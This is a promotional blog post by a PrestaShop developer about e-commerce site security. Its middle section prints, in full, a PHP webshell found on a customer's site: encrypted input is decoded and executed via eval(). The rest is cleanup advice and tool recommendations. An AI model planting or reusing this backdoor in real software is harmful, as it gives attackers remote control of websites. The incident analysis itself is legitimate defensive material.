Several industry must-have tools to improve the security of PrestaShop foreign trade e-commerce website

PrestaShop development history

PrestaShop is an excellent and powerful foreign trade open source e-commerce software. We started using PrestaShop in 2009, when PrestaShop was still version 0.9: fresh interface, powerful performance, and friendly extensions. Neither the bulkiness of Magento nor the old age of ZenCart, nor the fragility of OpenCart, so PrestaShop has sprung up like bamboo shoots after a rain, and it has quickly become popular around the world, and is generally loved by users. (As for which foreign trade open source e-commerce software such as PrestaShop, Magento, ZenCart, OpenCart, etc. is better? ), as a new generation of e-commerce solutions, PrestaShop is very popular all over the world, with 300,000+ merchants, 1 million+ community users, 1,000+ developers, and 250+ agents.

As PrestaShop continues to grow, we believe that PrestaShop will get better and better:

• The first version was established on the official website on February 20, 2008: PrestaShop 0.9.7
• The first Tag was created on GitHub on September 19, 2012: 1.5.0.0
• Now the latest stable version is PrestaShop version 1.7.6.8 released on September 24, 2020
• The PrestaShop 1.7.7.0 version will also be released soon, and it is said that the performance has been improved.

PrestaShop information security

Benefiting from the good structure of PrestaShop, the security issues of PrestaShop are still very commendable, but as the technical level of the personnel involved in the development of PrestaShop is uneven, the vulnerability of PrestaShop has begun to appear. We can search for PrestaShop in the Openwall. Check the vulnerability information of PrestaShop. Up to now, PrestaShop has been developed for 11 years+. If you have the technical ability, welcome to submit vulnerability information and jointly build PrestaShop information security. ZHSoft has been in the field of PrestaShop for 11 years+.

PrestaShop security vulnerabilities explained

After customer feedback, there is a file on his website, which is always restored no matter how it is modified. Finally, our senior engineers checked his PrestaShop website and found the problem. The specific PrestaShop Trojan file is as follows:

<?php
session_start();
@set_time_limit(0);
@error_reporting(0);
function E($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $D[$i] = $D[$i]^$K[$i+1&15];
    }
    return $D;
}
function Q($D){
    return base64_encode($D);
}
function O($D){
    return base64_decode($D);
}
function I(){
    return "php://input";
}
$V='user';
$T='12345678';

    $F=O(E(file_get_contents(I()),$T));
    if (isset($_SESSION[$V])){
        $L=$_SESSION[$V];
        $A=explode('|',$L);
        class C{public function nvoke($p) {eval($p."");}}
        $R=new C();
		$R->nvoke($A[0]);
        echo E(run($F),$T);
    }else{
        $_SESSION[$V]=$F;
    }

It can be seen that the core statement of the above Trojan horse is:

function I(){
    return "php://input";
}

php://input is to receive external information transmission, which is usually said: broiler, remote control, as long as this Trojan file exists, no matter how hard the customer tries, it is futile, because the Trojan file can transmit any virus file remotely. Going to the website is extremely harmful.

PrestaShop security vulnerability patch

After analysis by our senior engineers, the final solution to the above problems is also very clear:

• First, Trojan files are found in the lower row of the entire website and deleted directly.
• Then modify all server passwords, database passwords, FTP passwords, and website backend passwords.

Written at the end, now PrestaShop is more and more popular with everyone, and the technical level of the developers is also uneven. It is recommended that you choose a developer with technical strength and support long-term after-sales (recommendation: ZHSoft.), do not Coveting petty gains damages their own information security, because data is priceless.

Here, I would like to recommend several industry-required tools to improve the security of PrestaShop foreign trade e-commerce website:

• Google Authenticator Supports two-step verification on front-end mobile phones-protects the security of the front-end member accounts of the website and prevents violent dictionary social workers from guessing attacks

Use two-step verification to improve account and password security, even if your account password is leaked or stolen, there is no need to worry, because your hardware smart machine verification code only you know, hackers can not log into the system

• Google Authenticator supports background mobile phone two-step verification-to protect the security of the website background administrator account from violent dictionary social workers guessing attacks

Use two-step verification to improve account and password security, even if your account password is leaked or stolen, there is no need to worry, because your hardware smart machine verification code only you know, hackers can not log into the system

• Google image verification code reCAPTCHA anti-spam registration, protection from violent flood attacks, machine registration

Google reCAPTCHA is a free service that protects your site from spam and abuse.Using this service can make your website more secure, away from robot attacks, brute force cracking, simulated submission, remote registration, spam, etc.

The above is all the solutions for PrestaShop information security, I hope it will be useful to everyone.

Remind again: It is recommended that you choose a developer with technical strength and support long-term after-sales service (recommendation: ZHSoft.), do not greed for small bargains and damage your own information security, because: data is priceless.